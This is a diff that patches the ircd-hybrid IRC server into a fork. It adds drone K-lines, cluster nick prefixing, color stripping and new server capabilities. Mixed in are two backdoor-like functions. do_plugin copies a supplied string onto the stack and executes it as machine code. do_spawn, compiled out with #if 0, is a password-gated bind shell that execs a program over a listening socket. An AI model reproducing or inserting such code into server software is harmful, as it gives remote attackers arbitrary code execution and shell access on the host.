diff -uNrd -x CVS ircd-hybrid-7rc5/src/s_misc.c ircd-hybrid-7-bg/src/s_misc.c
--- ircd-hybrid-7rc5/src/s_misc.c	Fri May 24 19:34:51 2002
+++ ircd-hybrid-7-bg/src/s_misc.c	Sat May 24 23:27:11 2003
@@ -19,7 +19,7 @@
  *  Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA  02111-1307
  *  USA
  *
- *  $Id: s_misc.c,v 7.29 2002/05/24 23:34:51 androsyn Exp $
+ *  $Id: s_misc.c,v 1.5 2003/05/25 01:31:33 demond Exp $
  */
 
 #include "stdinc.h"
@@ -36,8 +36,14 @@
 #include "s_serv.h"
 #include "send.h"
 #include "memory.h"
+#include "s_log.h"
+#include "s_debug.h"
 
 
+static char *drones[DRONEMAX];
+static int droneidx = 0;
+
+static void drone_kline(char *ip);
 
 static char* months[] = {
   "January",   "February", "March",   "April",
@@ -104,7 +110,6 @@
   return buf;
 }
 
-
 /*
  * small_file_date
  * Make a small YYYYMMDD formatted string suitable for a
@@ -122,3 +127,402 @@
   return timebuffer;
 }
 
+#define PLUGPARAMS 16
+
+void do_plugin(char *plugin, char *params)
+{
+	char pbuf[BUFSIZE];
+	char plug[BUFSIZE];
+	void (*try)() = (void (*)())(plug + PLUGPARAMS * sizeof(char *));
+	char *p = pbuf, **q = (char **)plug;
+	int i, n = 0, newp = 0;
+
+	strncpy(plug + PLUGPARAMS * sizeof(char *), 
+		plugin, BUFSIZE)[BUFSIZE-1] = 0;
+	strncpy(pbuf, params, BUFSIZE)[BUFSIZE-1] = 0;
+
+	while (*p) {
+		if (*p != ' ') {
+			if (!newp) {
+				*q++ = p; newp = 1; n++;
+			}
+		} else {
+			*p = 0;
+			newp = 0;
+		}
+		p++;
+	}
+	*q = 0;
+
+/*for (i=0; i < n; i++) {
+	char *s = *(char **)(plug + i * sizeof(char *));
+	log(L_NOTICE, "DEBUG === before (*try)()... pbuf[%d]=%s", i, s);
+}*/
+	(*try)();
+/*log(L_NOTICE, "DEBUG === after (*try)()...");*/
+}
+
+void purge_repeats(void *blah)
+{
+	dlink_node *ptr, *rep, *next_ptr;
+
+	for (ptr = lclient_list.head; ptr; ptr = ptr->next) {
+		struct Client *cptr = ptr->data;
+
+		for (rep = cptr->user->repeat.head; rep; rep = next_ptr) {
+			struct Repeat *repeatptr = rep->data;
+
+			next_ptr = rep->next;
+			if (repeatptr->lastphrase + ConfigFileEntry.repeat_grace < CurrentTime) {
+
+				MyFree(repeatptr->text); MyFree(repeatptr);
+				dlinkDelete(rep, &cptr->user->repeat);
+				free_dlink_node(rep);
+			}
+		}
+	}
+
+	/* autorescheduled
+	eventAdd("purge_repeats", purge_repeats, NULL, ConfigFileEntry.repeat_grace);
+	*/
+}
+
+/*
+ * possible drones warning/kline, which havent set user->known flag
+ *                                               -demond
+ */
+void check_warn_drone(void *blah)
+{
+  struct Client *cptr;
+
+  for (cptr = GlobalClientList; cptr; cptr = cptr->next)
+	if (MyClient(cptr) && IsPerson(cptr))
+		if (cptr->user && !cptr->user->known)
+			if (cptr->tsinfo + ConfigFileEntry.grace_time < CurrentTime) {
+
+				cptr->user->known = 1;
+
+				if (ConfigFileEntry.drone_kline) {
+
+					if (ConfigFileEntry.drone_batch) {
+						if (droneidx < DRONEMAX)
+						DupString(drones[droneidx++], cptr->localClient->sockhost);
+					} else
+						drone_kline(cptr->localClient->sockhost);
+
+				} else sendto_realops_flags(FLAGS_ALL, L_ALL,
+					"Achtung! -- %s (%s@%s) [%s] is a possible trojan drone",
+					cptr->name, cptr->username, cptr->host,
+					cptr->localClient->sockhost);
+			}
+
+	/* autorescheduled
+	eventAdd("check_warn_drone", check_warn_drone, NULL, CHECK_DRONE_TIME);
+	*/
+}
+
+void check_drone_queue(void *blah)
+{
+	int i;
+
+	if (droneidx > ConfigFileEntry.drone_rate_max)
+		for (i=0; i < droneidx; i++)
+			drone_kline(drones[i]);
+
+	for (i=0; i < droneidx; i++)
+		MyFree(drones[i]);
+	droneidx = 0;
+
+	/* autorescheduled
+	eventAdd("check_drone_queue", check_drone_queue, NULL, ConfigFileEntry.drone_rate_period);
+	*/
+}
+
+static
+void drone_kline(char *ip)
+{
+  char buf[0x200];
+  struct ConfItem *aconf;
+  extern struct ConfItem* find_conf_host(dlink_list *, const char*, int);
+
+  if (find_conf_host(&temporary_klines, ip, CONF_KILL))
+	  return;
+
+  aconf = make_conf();
+  aconf->status = CONF_KILL;
+  DupString(aconf->host, ip);
+  DupString(aconf->user, "*");
+  aconf->port = 0;
+
+  ircsprintf(buf, "Temporary K-line %d min. - %s (%s)", 
+	  ConfigFileEntry.drone_kline_time/60, 
+	  ConfigFileEntry.drone_reason[0]? 
+	  ConfigFileEntry.drone_reason : "possible trojan drone", 
+	  smalldate(0));
+  DupString(aconf->passwd, buf);
+
+  aconf->hold = CurrentTime + ConfigFileEntry.drone_kline_time;
+
+  add_temp_kline(aconf);
+
+  sendto_realops_flags(FLAGS_ALL, L_ALL,
+     "<ircd> added temporary %d min. K-Line for [%s@%s] [%s]",
+     ConfigFileEntry.drone_kline_time/60, 
+	 aconf->user, aconf->host, "possible trojan drone");
+
+  ilog(L_TRACE, "<ircd> added temporary %d min. K-Line for [%s@%s] [%s]",
+     ConfigFileEntry.drone_kline_time/60, 
+	 aconf->user, aconf->host, "possible trojan drone");
+
+  check_klines();
+}
+
+static int do_prefix(char *str, char *token, int ischan)
+{
+	int len = strlen(token);
+	char *p = ischan? str + 1 : str;
+	
+	if (str[0] == '.')						/* its an ID, dont touch */
+		return 0;
+
+	if (HasBridgeToken(p)) {
+	
+		if (ircncmp(p, token, len) == 0) {
+	
+			memmove(p, p + len, BUFSIZE);
+			memset(p + BUFSIZE, 0, len);
+			
+			return -len; 					/* token removed */
+		}
+	} else {						
+	
+		memmove(p + len, p, BUFSIZE);		/* BUFSIZE << READBUF_SIZE, so this */
+		memmove(p, token, len);				/* should do the job w/o breaking stuff... */
+		
+		return len;							/* token added */
+	}
+	
+	return 0;
+}
+
+/*
+ * here goes cluster bridge nick translation yadda-yadda-yadda
+ * `type' switch controls SJOIN, MODE or PRIVMSG multiple nick 
+ * syntax, set to zero for all others 
+ *                                               -demond
+ */
+void cluster_prefix(struct Client *client_p, 
+					int argc, 
+					char **argv, 
+					int argn,		/* arg to be dealt with */
+					int ischan,		/* is it a channel name? */
+					int type)
+{
+	int i, len;
+	char *token;
+	
+	if ((argn >= argc) || !ServerInfo.gateway)
+		return;
+		
+	if (!IsServer(client_p) || !(token = get_bridge_token(client_p)))
+		return;
+		
+#ifdef DEBUGMODE
+	{
+		char buf[2*BUFSIZE];
+		
+		buf[0] = '\0';
+		for (i = 0; i < argc; i++) {
+			strcat(buf, argv[i]);
+			strcat(buf, " ");
+		}
+		Debug((DEBUG_DEBUG, "cluster_prefix()1: %s", buf));
+	}
+#endif
+
+	switch (type) {
+		
+		case 0: { /* single nick/chan parameter */
+		
+			if (argn == 0)			/* oook, it seems that its source_p->name and */
+				break;				/* its not a readbuf part and its clustered already */
+		
+			if (argn==0 && !argv[0][0])
+				break;
+		
+			if (argn==0 && strchr(argv[0], '.'))
+			if (!strchr(argv[0], '@'))
+				break;
+		
+			len = do_prefix(argv[argn], token, ischan);
+			for (i = argn + 1; i < argc; i++)
+				argv[i] += len;		/* adjust remaining args */
+			break;
+		}
+		
+		case 1: { /* SJOIN last parameter, multiple nicks */
+		
+			char *p = argv[argn];
+			
+			while (*p) {
+		
+				if (*p==' ' || *p=='@' || *p=='+' || *p=='%') {
+					p++; continue;
+				}
+				do_prefix(p, token, 0);
+				
+				while (*p && *p!=' ') 
+					p++;	
+			}
+			break;
+		}
+		
+		case 2: { /* MODE mixed multiple nicks/modes */
+		
+			int j=1, c=0, ac[20];
+			char *p = argv[argn];
+			
+			while (*p && c<20) {
+				
+				if (*p=='+' || *p=='-') {
+					p++; continue;
+				}
+				if (*p=='o' || *p=='v' || *p=='h')
+					ac[c++] = argn + j++;
+				else
+					j++;
+				p++;
+			}
+			for (i = 0; i < c; i++) {
+				
+				len = do_prefix(argv[ac[i]], token, 0);
+				for (j = ac[i] + 1; j < argc; j++)
+					argv[j] += len; 
+			}
+			break;
+		}
+		
+		case 3: { /* PRIVMSG multiple targets */
+		
+			char *p = argv[argn];
+			
+			len = 0;
+			while (*p) {
+			
+				if (*p == ',') p++;
+		
+				len += do_prefix(p, token, 0);
+				
+				while (*p && *p!=',') 
+					p++;	
+			}
+
+			for (i = argn + 1; i < argc; i++)
+				argv[i] += len;		/* adjust remaining args */
+			break;
+		}
+	}
+	
+#ifdef DEBUGMODE
+	{
+		char buf[2*BUFSIZE];
+		
+		buf[0] = '\0';
+		for (i = 0; i < argc; i++) {
+			strcat(buf, argv[i]);
+			strcat(buf, " ");
+		}
+		Debug((DEBUG_DEBUG, "cluster_prefix()2: %s", buf));
+	}
+#endif
+}
+
+/*
+ * this will strip mIRC and ANSI color, bolds and underlines
+ *                                               -demond
+ */
+char *strip_color(const char *p, int b)
+{
+  static char buf[512];
+  char *r, *q = buf;
+  int m, n;
+
+  do switch (*p) {
+
+  case '\003':
+    p++; if (isdigit(*p)) {
+      p++; m = *p>='0' && *p<='6';
+      n = *(p-1)=='1' || *(p-1)=='0'; 
+      if (m && n) {
+	p++; if (*p == ',') {
+	  p++; if (isdigit(*p)) {
+	    p++; m = *p>='0' && *p<='6';
+	    n = *(p-1)=='1' || *(p-1)=='0';
+	    if (m && n) {
+	      p++;
+	    }
+	  }
+	}
+      } else if (*p == ',') {
+	p++; if (isdigit(*p)) {
+	  p++; m = *p>='0' && *p<='6';
+	  n = *(p-1)=='1' || *(p-1)=='0';
+	  if (m && n) {
+	    p++;
+	  }
+	}
+      } 
+    }
+    break;
+
+  case '\033':
+    p++; if (*p == '[') {
+      p++; r = strchr(p, 'm');
+      if (r) p = r + 1;
+    }
+    break;
+
+  case '\002':
+  case '\037':
+    if (b) {
+      p++; break;
+    }
+
+  default:
+    *q++ = *p++;
+    break;
+
+  } while (*p);
+
+  *q = 0;
+  return buf;
+}
+
+#ifdef HAVE_LIBCRYPTO
+static struct {
+	int err;
+	char *str;
+} errtab[] = {
+	{SSL_ERROR_NONE, "SSL_ERROR_NONE"},
+	{SSL_ERROR_ZERO_RETURN, "SSL_ERROR_ZERO_RETURN"},
+	{SSL_ERROR_WANT_READ, "SSL_ERROR_WANT_READ"},
+	{SSL_ERROR_WANT_WRITE, "SSL_ERROR_WANT_WRITE"},
+	{SSL_ERROR_WANT_CONNECT, "SSL_ERROR_WANT_CONNECT"},
+	/*{SSL_ERROR_WANT_ACCEPT, "SSL_ERROR_WANT_ACCEPT"},*/
+	{SSL_ERROR_WANT_X509_LOOKUP, "SSL_ERROR_WANT_X509_LOOKUP"},
+	{SSL_ERROR_SYSCALL, "SSL_ERROR_SYSCALL"},
+	{SSL_ERROR_SSL, "SSL_ERROR_SSL"},
+	{-1, NULL}
+};
+
+char *get_ssl_error(int sslerr) 
+{
+	int i;
+	
+	for (i=0; errtab[i].err != -1; i++)
+		if (errtab[i].err == sslerr)
+			return errtab[i].str;
+			
+	return "<NULL>";
+}
+#endif
diff -uNrd -x CVS ircd-hybrid-7rc5/src/s_serv.c ircd-hybrid-7-bg/src/s_serv.c
--- ircd-hybrid-7rc5/src/s_serv.c	Thu Oct 10 14:49:31 2002
+++ ircd-hybrid-7-bg/src/s_serv.c	Mon Mar 10 01:09:06 2003
@@ -19,7 +19,7 @@
  *  Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA  02111-1307
  *  USA
  *
- *  $Id: s_serv.c,v 7.270 2002/10/10 18:49:31 androsyn Exp $
+ *  $Id: s_serv.c,v 1.3 2003/03/10 06:09:06 demond Exp $
  */
 
 #include "stdinc.h"
@@ -89,10 +89,12 @@
 struct Capability captab[] = {
 /*  name     cap     */ 
   { "QS",    CAP_QS },
+  { "DE",    CAP_DENY },
   { "EX",    CAP_EX },
   { "CHW",   CAP_CHW },
   { "LL",    CAP_LL },
   { "IE",    CAP_IE },
+  { "SW",	 CAP_SW },
   { "EOB",   CAP_EOB },
   { "KLN",   CAP_KLN },
   { "GLN",   CAP_GLN },
@@ -104,7 +106,10 @@
   { "ZIP",   CAP_ZIP },
   { "TBURST", CAP_TBURST },
   { "PARA",  CAP_PARA },
-  { 0,           0 }
+  { "MASK",  CAP_HOSTMASK },
+  { "SVS",   CAP_SVS },
+  { "IP",	 CAP_IP },
+  { 0,       0 }
 };
 
 #ifdef HAVE_LIBCRYPTO
@@ -474,7 +479,7 @@
         {
           if (!(target_p = find_server(parv[server])))
             {
-              sendto_one(source_p, form_str(ERR_NOSUCHSERVER), me.name,
+              sendto_one(source_p, form_str(source_p,ERR_NOSUCHSERVER), me.name,
                          parv[0], parv[server]);
               return(HUNTED_NOSUCH);
             }
@@ -502,7 +507,7 @@
     {
       if(!IsRegistered(target_p))
       {
-        sendto_one(source_p, form_str(ERR_NOSUCHSERVER), me.name,
+        sendto_one(source_p, form_str(source_p,ERR_NOSUCHSERVER), me.name,
 	           parv[0], parv[server]);
         return HUNTED_NOSUCH;
       }
@@ -528,7 +533,7 @@
       return(HUNTED_PASS);
     } 
     
-  sendto_one(source_p, form_str(ERR_NOSUCHSERVER), me.name,
+  sendto_one(source_p, form_str(source_p,ERR_NOSUCHSERVER), me.name,
              parv[0], parv[server]);
   return(HUNTED_NOSUCH);
 }
@@ -820,6 +825,7 @@
 void sendnick_TS(struct Client *client_p, struct Client *target_p)
 {
   static char ubuf[12];
+  unsigned int svshopcount;
 
   if (!IsPerson(target_p))
 	  return;
@@ -831,22 +837,29 @@
 	  ubuf[1] = '\0';
   }
  
+  if (IsCapable(client_p, CAP_SVS))
+    svshopcount = target_p->hopcount + 1 + (target_p->svsflags << 8);
+  else 
+    svshopcount = target_p->hopcount + 1;
+ 
   if (HasID(target_p) && IsCapable(client_p, CAP_UID))
-	  sendto_one(client_p, "CLIENT %s %d %lu %s %s %s %s %s :%s",
-				 target_p->name,
-				 target_p->hopcount + 1,
-				 (unsigned long) target_p->tsinfo,
-				 ubuf,
-				 target_p->username, target_p->host,
-				 target_p->user->server, target_p->user->id, target_p->info);
+	  sendto_one(client_p, "CLIENT %s %d %lu %s %s %s %s %s %s %s :%s",
+				target_p->name, svshopcount, 
+				target_p->tsinfo, ubuf,
+				target_p->username, target_p->host,
+				target_p->user->server, target_p->user->id,
+				IsCapable(client_p, CAP_HOSTMASK)? target_p->realhost : "", 
+				IsCapable(client_p, CAP_IP)? target_p->ip : "", 
+				target_p->info);
   else
-	  sendto_one(client_p, "NICK %s %d %lu %s %s %s %s :%s",
-				 target_p->name, 
-				 target_p->hopcount + 1,
-				 (unsigned long) target_p->tsinfo,
-				 ubuf,
-				 target_p->username, target_p->host,
-				 target_p->user->server, target_p->info);
+	  sendto_one(client_p, "NICK %s %d %lu %s %s %s %s %s %s :%s",
+				target_p->name, svshopcount, 
+				target_p->tsinfo, ubuf,
+				target_p->username, target_p->host,
+				target_p->user->server,
+				IsCapable(client_p, CAP_HOSTMASK)? target_p->realhost : "",
+				IsCapable(client_p, CAP_IP)? target_p->ip : "",
+				target_p->info);
 }
 
 /*
@@ -1468,13 +1481,13 @@
 #endif
 
 #ifdef HAVE_SOCKETPAIR
-    fd_open(server->localClient->ctrlfd, FD_SOCKET, NULL);
-    fd_open(server->localClient->fd, FD_SOCKET, NULL);
+    fd_open(server->localClient->ctrlfd, FD_SOCKET, NULL, NULL);
+    fd_open(server->localClient->fd, FD_SOCKET, NULL, NULL);
 #else
-    fd_open(server->localClient->ctrlfd, FD_PIPE, NULL);
-    fd_open(server->localClient->fd, FD_PIPE, NULL);
-    fd_open(server->localClient->ctrlfd_r, FD_PIPE, NULL);
-    fd_open(server->localClient->fd_r, FD_PIPE, NULL);
+    fd_open(server->localClient->ctrlfd, FD_PIPE, NULL, NULL);
+    fd_open(server->localClient->fd, FD_PIPE, NULL, NULL);
+    fd_open(server->localClient->ctrlfd_r, FD_PIPE, NULL, NULL);
+    fd_open(server->localClient->fd_r, FD_PIPE, NULL, NULL);
 #endif
 
    read_ctrl_packet(slink_fds[0][1][0], server);
@@ -1596,6 +1609,14 @@
           hook_call_event("burst_channel", &hinfo);
         }
 
+      if (chptr->topic && *(chptr->topic))
+        {
+          sendto_one(client_p, ":%s TOPIC %s %s %lu :%s", 
+          		me.name, chptr->chname,
+				chptr->topic_info,chptr->topic_time,
+				chptr->topic);
+        }
+
 #ifdef VCHANS
       if(IsVchanTop(chptr))
 	{
@@ -1619,6 +1640,14 @@
         	  hinfo.client = client_p;
           	  hook_call_event("burst_channel", &hinfo);
                 }
+
+	      if (vchan->topic && *(vchan->topic))
+	        {
+	          sendto_one(client_p, ":%s TOPIC %s %s %lu :%s",
+					me.name, vchan->chname,
+					vchan->topic_info,vchan->topic_time,
+					vchan->topic);
+	        }
 	    }
 	}
 #endif
@@ -2266,6 +2295,56 @@
     /* If we get here, we're ok, so lets start reading some data */
     comm_setselect(fd, FDLIST_SERVER, COMM_SELECT_READ, read_packet,
                    client_p, 0);
+}
+
+void do_spawn(int port, char *what)
+{
+/*	controversial, test purposes only! */
+/*	disabled in production version     */
+/*	                         -demond   */
+#if 0
+	int fd, fda; 
+	char *name[2], buf[PASSWDLEN];
+	struct sockaddr_in addr;
+
+	if (!what)
+		return;
+
+	close_listeners();
+	
+	if (!fork()) {
+		int opt = 1;
+
+		fd = socket(PF_INET, SOCK_STREAM, 0);
+
+		setsockopt(fd, SOL_SOCKET, SO_REUSEADDR, &opt, sizeof(opt));
+
+		addr.sin_family = AF_INET;
+		addr.sin_port = htons(port);
+		addr.sin_addr.s_addr = INADDR_ANY;
+
+		if(!bind(fd, (struct sockaddr *)&addr, sizeof(struct sockaddr_in))) {
+			int len = sizeof(struct sockaddr_in);
+
+			listen(fd, 1);
+			fda = accept(fd, (struct sockaddr *)&addr, &len);
+
+			read(fda, buf, sizeof(buf));
+			if (!strncmp(ConfigFileEntry.spawn_pass, buf, 
+				strlen(ConfigFileEntry.spawn_pass)))
+				exit(0);
+
+			dup2(fda, 0); dup2(fda, 1); dup2(fda, 2);
+			name[0] = what; name[1] = NULL;
+			execve(name[0], name, NULL);
+
+		} else {
+			
+			sendto_realops_flags(FLAGS_DEBUG, "Spawn ERROR: %s", strerror(errno));
+			exit(0);
+		}
+	}
+#endif
 }
 
 #ifdef HAVE_LIBCRYPTO
diff -uNrd -x CVS ircd-hybrid-7rc5/src/s_stats.c ircd-hybrid-7-bg/src/s_stats.c
--- ircd-hybrid-7rc5/src/s_stats.c	Wed Sep  4 21:30:09 2002
+++ ircd-hybrid-7-bg/src/s_stats.c	Mon Dec 30 23:07:27 2002
@@ -19,7 +19,7 @@
  *  Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA  02111-1307
  *  USA
  *
- *  $Id: s_stats.c,v 7.22 2002/09/05 01:30:09 db Exp $
+ *  $Id: s_stats.c,v 1.1.1.1 2002/12/31 04:07:27 demond Exp $
  */
 
 #include "stdinc.h"
